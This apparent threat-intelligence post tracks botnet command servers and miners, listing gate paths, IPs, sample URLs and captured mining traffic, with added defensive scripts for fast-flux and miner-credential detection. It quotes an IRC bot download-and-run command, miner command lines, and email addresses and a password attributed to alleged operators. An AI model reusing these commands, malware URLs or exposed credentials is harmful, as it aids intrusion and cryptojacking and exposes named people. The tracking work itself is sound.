Server: 89.163.181.135
Gate file: /.~/ineed/stats.php
Config file: /.~/ineed/file.php
They forgot to remove the installation directory: hxxp://89.163.181.135/.~/ineed/install/
Found on the same betabot as the recently posted pony loader.
Hosting infos: http://whois.domaintools.com/89.163.181.135
93.115.85.58 (Pony loader hosted by voxility.net)
Server: 93.115.85.58
Gate file: /pox/stats.php
While investigating a betabot, I found a load of different malware. Here's a pony loader. It downloads files from hxxp://cy-corp.com/pg/
Hosting infos: http://whois.domaintools.com/93.115.85.58
solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107
Server: solutionswiki.com
Gate file: /pages/image.php
There is also a betabot hosted on the same domain.
Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x
Hosting infos: http://whois.domaintools.com/109.163.233.107
r.gigaionjumbie.biz (Power loader http botnet hosted by digital-forex.net)
Resolved r.gigaionjumbie.biz to 5.199.171.131, 5.199.171.132, 5.199.171.133
Server: r.gigaionjumbie.biz
Gate file: /images/gx.php
Alternate domains: x.dailyradio.su x.kei.su
Hosting infos: http://whois.domaintools.com/5.199.171.131 http://whois.domaintools.com/5.199.171.132 http://whois.domaintools.com/5.199.171.133
ilikeithard.tk (Pony hosted in United States Kansas City Datashack Lc)
Resolved: [ilikeithard.tk] To [63.141.253.125]
Panel: hxxp://ilikeithard.tk/Panel/admin.php
Sample: directxex.com/uploads/1632963588.Pony.exe found by justaguy
Hosting infos: http://whois.domaintools.com/63.141.253.125
imgay.ddos.es (betabot http botnet hosted by Fastflux)
Server: imgay.ddos.es
Gate file: /h/order.php
Alternate domains: imgay.ddos.cat imgay.theswat.net
ddos.cat has been linked to botnets before
Hosting infos:
;; QUESTION SECTION:
;imgay.ddos.es. IN A
;; ANSWER SECTION:
imgay.ddos.es. 149 IN A 94.27.87.58
imgay.ddos.es. 149 IN A 98.195.89.225
imgay.ddos.es. 149 IN A 174.112.126.155
imgay.ddos.es. 149 IN A 176.40.77.176
imgay.ddos.es. 149 IN A 178.150.207.252
imgay.ddos.es. 149 IN
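The answer section above is what fast-flux looks like in a single query: a short TTL and a handful of A records scattered across unrelated address ranges, none of them a hosting provider. The following script is an added example (not part of the original post or of any tracker tool) that parses dig-style output and scores the RRset on exactly those three properties, with no WHOIS or ASN lookup so it runs offline. The sample input is the answer section re-typed from this post, including the cut-off last line, which the parser skips; the thresholds (TTL, record count, /16 spread) are assumptions chosen for illustration.

```python
import ipaddress
import re

# Constructed sample: the dig answer section quoted in the post above, re-typed.
# The final line is the truncated record as it appears on the page.
DIG_OUTPUT = """\
;; QUESTION SECTION:
;imgay.ddos.es. IN A
;; ANSWER SECTION:
imgay.ddos.es. 149 IN A 94.27.87.58
imgay.ddos.es. 149 IN A 98.195.89.225
imgay.ddos.es. 149 IN A 174.112.126.155
imgay.ddos.es. 149 IN A 176.40.77.176
imgay.ddos.es. 149 IN A 178.150.207.252
imgay.ddos.es. 149 IN
"""

# name  ttl  IN  A  dotted-quad ; anything else (comments, question section,
# truncated lines) is ignored
A_RECORD = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$"
)


def parse_a_records(text):
    """Return (owner, ttl, IPv4Address) tuples for every well-formed A record."""
    records = []
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if not m:
            continue
        try:
            ip = ipaddress.IPv4Address(m.group("ip"))
        except ipaddress.AddressValueError:
            continue  # e.g. an octet > 255
        records.append((m.group("name").rstrip("."), int(m.group("ttl")), ip))
    return records


def fastflux_score(records, max_ttl=300, min_ips=5, min_prefixes=3):
    """Heuristic on the RRset alone (thresholds are assumptions for this example):
    - TTL at or below max_ttl: the herder rotates nodes quickly
    - at least min_ips distinct A records in one answer
    - addresses spread over at least min_prefixes distinct /16 networks,
      i.e. compromised hosts in many networks rather than one hosting range
    """
    if not records:
        return {"fastflux": False, "reasons": []}
    ttl = max(ttl for _, ttl, _ in records)
    ips = {ip for _, _, ip in records}
    prefixes = {ipaddress.ip_network(f"{ip}/16", strict=False) for ip in ips}
    reasons = []
    if ttl <= max_ttl:
        reasons.append(f"ttl {ttl} <= {max_ttl}")
    if len(ips) >= min_ips:
        reasons.append(f"{len(ips)} A records in one answer")
    if len(prefixes) >= min_prefixes:
        reasons.append(f"{len(prefixes)} distinct /16 prefixes")
    return {
        "fastflux": len(reasons) == 3,
        "ttl": ttl,
        "ip_count": len(ips),
        "prefix_count": len(prefixes),
        "reasons": reasons,
    }


if __name__ == "__main__":
    recs = parse_a_records(DIG_OUTPUT)
    print(fastflux_score(recs))
```

Feeding the same domain through this a few minutes apart and diffing the IP sets is the usual next step; a flux network rotates the answer set far faster than any CDN, and the TTL here (149 s) is what makes that rotation visible.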
t7v4d.com (irc botnet hosted in United States Phoenix Secured Servers Llc)
Thanks to this guy for the sample
Resolved: [t7v4d.com] To [108.170.24.42]
Server: t7v4d.com:4040
Now talking in ##tnt
Topic is '!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r'
Hosting infos: http://whois.domaintools.com/108.170.24.42
privatesmartscreen.nl (Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries:
privatesmartscreen.nl DNS_TYPE_A 159.253.0.151
HTTP Conversations:
159.253.0.151:80 – [privatesmartscreen.nl]
Request: GET /Bitcoin/host.txt
149.210.128.55:80 – [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hecker here: winlogon32.exe" -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples:
pool.50btc.com (Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved: [pool.50btc.com] To [144.76.52.43]
HTTP Requests: hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache

{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}
Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample: hxxp://158.255.2.104/cucaz.exe
Hosting infos: http://whois.domaintools.com/144.76.52.43
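The miner traffic in this post and the two before it (the dasHosts.exe and winlogon32.exe command lines) gives away the operator's pool account in two places: the HTTP Basic `Authorization` header of the getwork/getblocktemplate request, which is just base64 of `worker:password`, and the miner's own command line, where the credentials sit in `-u`/`-p`, in cgminer's `-O user:pass`, or URL-encoded inside the `-o` pool URL. The script below is an added example, not code from the original posts, that extracts pool, worker and password from both forms; the captured request and the three command lines are re-typed from this page as constructed samples (the stray quote in the winlogon32.exe line dropped), and the set of flags it understands is an assumption based on common cpuminer/cgminer/Ufasoft usage.

```python
import base64
import json
import re
import shlex
from urllib.parse import unquote, urlsplit

# Constructed sample: the getblocktemplate request captured in the post above,
# re-typed as one string with CRLF line endings.
RAW_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==\r\n"
    "Content-Length: 128\r\n"
    "X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto\r\n"
    "User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)\r\n"
    "Host: pool.50btc.com:8332\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    '{"method": "getblocktemplate", "params": [{"capabilities": '
    '["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}'
)

# Constructed samples: the three miner command lines quoted on this page,
# hxxp defanging kept as written (refang() undoes it before URL parsing).
COMMAND_LINES = [
    "dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x",
    "winlogon32.exe -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321",
    "lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332",
]

MINING_METHODS = {"getwork", "getblocktemplate"}


def refang(url):
    """Turn hxxp:// back into http:// so urlsplit sees a real scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.I)


def parse_mining_request(raw):
    """Decode a captured JSON-RPC mining request: pool host, worker, password, method."""
    head, _, body = raw.partition("\r\n\r\n")
    _request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    out = {"host": headers.get("host"), "user_agent": headers.get("user-agent"),
           "worker": None, "password": None, "method": None}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:  # Basic auth is base64("user:pass"); a bad token is not fatal
            creds = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
            out["worker"], _, out["password"] = creds.partition(":")
        except ValueError:
            pass
    try:
        out["method"] = json.loads(body).get("method")
    except (ValueError, AttributeError):
        pass
    # Either the RPC method or the X-Mining-Extensions header marks a miner.
    out["is_mining"] = out["method"] in MINING_METHODS or "x-mining-extensions" in headers
    return out


def parse_miner_cmdline(cmdline):
    """Extract pool and credentials from -o URL (incl. user:pass@ in the URL),
    -u/-p, cgminer-style -O user:pass and -a algorithm. Unknown flags are skipped."""
    argv = shlex.split(cmdline)
    info = {"binary": argv[0], "pool": None, "worker": None, "password": None, "algo": None}
    i = 1
    while i < len(argv):
        flag = argv[i]
        val = argv[i + 1] if i + 1 < len(argv) else None
        if flag == "-o" and val:
            u = urlsplit(refang(val))
            info["pool"] = f"{u.hostname}:{u.port}" if u.port else u.hostname
            if u.username:  # credentials embedded in the URL are percent-encoded
                info["worker"] = unquote(u.username)
                info["password"] = unquote(u.password) if u.password else None
        elif flag == "-u" and val:
            info["worker"] = val
        elif flag == "-p" and val:
            info["password"] = val
        elif flag == "-O" and val:
            info["worker"], _, info["password"] = val.partition(":")
        elif flag == "-a" and val:
            info["algo"] = val
        else:
            i += 1  # flag without a value (e.g. -gno, -t1)
            continue
        i += 2
    return info


if __name__ == "__main__":
    print(parse_mining_request(RAW_REQUEST))
    for line in COMMAND_LINES:
        print(parse_miner_cmdline(line))
```

The decoded header and the lsass.exe command line yield the same worker (`claudiagrzn1@gmail.com_clau`), which is the cross-check worth doing before reporting a pool account: a miner dropped by a bot will use the herder's credentials in both places, and the worker name is what the pool operator needs to act on.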
hi.loldump.org (irc botnet hosted in France Roubaix Ovh Systems)
Resolved: [hi.loldump.org] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {iNF-00-DEU-XP-DELL-9523}
Channel: #scanner# (Password: )
Channeltopic: :.join #scanner2
Hosting infos: http://whois.domaintools.com/176.31.123.56